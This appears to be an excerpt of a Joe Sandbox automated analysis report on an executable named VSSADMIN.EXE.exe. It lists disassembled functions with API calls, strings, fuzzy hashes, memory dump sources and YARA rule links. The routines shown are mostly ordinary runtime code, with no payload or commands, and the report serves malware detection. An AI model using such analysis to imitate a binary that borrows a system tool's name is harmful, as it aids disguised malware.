                                                                                                                                                                      • Instruction ID: cb55e11e228a2a7467eeab2d25f24b4dd5abe3b95e3ad79e3ee219c0287d43cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 03277c719d17d560c79db32ac0887211ffe2f08df489d569bf0de2f6ccb26345
                                                                                                                                                                      • Instruction Fuzzy Hash: 02113A24F0CE4342FA58936AA5C11BA61725F46FB0F585336E93EC77D6EE2DA442A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A724 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A735
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A754
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A77C
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A78D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A79E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: e5b2f5253a305bcc5ca3be95ebd57ba54efab24c1a16ac20d661c62881fac6f9
                                                                                                                                                                      • Instruction ID: 0194e0d27ffd21c3f8c13ecddd487f401db385377c681af90af8ba56de308296
                                                                                                                                                                      • Opcode Fuzzy Hash: e5b2f5253a305bcc5ca3be95ebd57ba54efab24c1a16ac20d661c62881fac6f9
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C11B728A0DE0342F958A63958D55BA21B24F47F74F180736E93ECB2D3ED2DB442B751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8F1C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                      • Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                      • Instruction ID: aa3a720b874d36c084131063d99b8c27c6138291c7ad935d2146308197c8cf15
                                                                                                                                                                      • Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                      • Instruction Fuzzy Hash: 65819C76E0CA5385F7A58E2981F027826B0AB57FA8F558037CB0AD7295DF2DF901A701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7E138 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                      • Instruction ID: 7708ddf7471669cd0a157c1e602e52a9422c251f8d813d077829149fa74f7ee6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                      • Instruction Fuzzy Hash: CC614937A08A858AEB10CF65D4812AD77B0FB46BA9F044226EF4D57B99CF38E155CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7E494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction ID: 016219f5bc2cb5ea05b40b06f03e317a7a95fdaf72173b25056b4d9c293bcfaf
                                                                                                                                                                      • Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction Fuzzy Hash: 50517A3390CA8687EA648F1595C43697BB0FB56FBAF144136DA9C87A95CF3CE4518B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C724D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-2410924014
                                                                                                                                                                      • Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction ID: 0cabe60dd2f0317458d7cc8b18423016e7112c85527d09ac3810cd807fd967c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction Fuzzy Hash: B831857262CA8292EA30D714E4916EA6374FF85F94F804037E68D87A99DF3DD345CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C73BC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                      • API String ID: 2581892565-1977442011
                                                                                                                                                                      • Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                      • Instruction ID: 711d856276ce07ae2e7d2679d58a58d86320b1af73e45da33f543d676ac51ce5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                      • Instruction Fuzzy Hash: EF017520B1DE8392FE209724D8863B51275AF5AB96F400133D84DC7292EE5DE155C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8BAA0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                      • Opcode ID: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                      • Instruction ID: 2e40456ab58387b5b3d3ced8f526ecf2c6219b08c69dc03f75355d0f082e8f35
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                      • Instruction Fuzzy Hash: DBD1D572B18E828AE711CF75D4802AC37B1FB56BA8B404136EF5D97B99EE38D416D300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C84804 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                      • Opcode ID: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction ID: dd55b42f2fde5e925cf492ec1fec847b750e0a2bf12d2e3cab28159a11257e2f
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B518222E08A528AFB24DFB5D4903BD73B5AF46F68F10453ADE4D87689EF38D4419704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                      • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction ID: 827ab80cacc80360e28ac13ff821de4bd6941a9723479130775979797aff58cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 04118631E1C94243FA549769E5842B952B3FBCAFA1F484132E94987B99CE2DD5858200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C94D6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: ?
                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                      • Opcode ID: 943dc617f45bed002e629b40e1fde0ce7e8ddbadaf2104e4c3051838adc72d4a
                                                                                                                                                                      • Instruction ID: 6243723ece32913ec4bcdc482baa7c948107280c40b936d205852b500f1de186
                                                                                                                                                                      • Opcode Fuzzy Hash: 943dc617f45bed002e629b40e1fde0ce7e8ddbadaf2104e4c3051838adc72d4a
                                                                                                                                                                      • Instruction Fuzzy Hash: 28410812A0CA8365FB649B25D58137AE6B0EB82FB8F144236EE5C87AD5DF3ED441C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C87E9C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C87ECE
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF614C7B135), ref: 00007FF614C87EEC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                      • API String ID: 1752791759-1688815890
                                                                                                                                                                      • Opcode ID: e5e537b1f25b6317a615cc166ba8ab4389d523c8332b43849fdef0541cca01c3
                                                                                                                                                                      • Instruction ID: 0b2ca9aeb5763d4a833c3ab8aaa6e583eb0686974bacee5ada8daabe44179aa5
                                                                                                                                                                      • Opcode Fuzzy Hash: e5e537b1f25b6317a615cc166ba8ab4389d523c8332b43849fdef0541cca01c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B414D32A09E5385E7159F26D8C00B967B4EB46FE4B544037EA4E87B85DF3DE8519310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8C138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                      • Instruction ID: 105004092851e96d1fb8d19be8496505c19edd8cfd7d6e0b675a146e1da7a494
                                                                                                                                                                      • Opcode Fuzzy Hash: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D418232618A4296DB20CF65E4843BA6771FB99BA4F504036EE4DC7798DF3CD441D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8E538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                      • Opcode ID: c79238bf43e0cbae76f50738f5baf0a43c8060c9bac1b93bc5b87429c8295926
                                                                                                                                                                      • Instruction ID: 2dfe0e81140b3302117c91b007f1316cc101a4416b68701f276e916ffa950930
                                                                                                                                                                      • Opcode Fuzzy Hash: c79238bf43e0cbae76f50738f5baf0a43c8060c9bac1b93bc5b87429c8295926
                                                                                                                                                                      • Instruction Fuzzy Hash: 3621B172A08A8282EB209B15D48427E63B1FB86F64F454037DA8DC3684DF7DE985DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
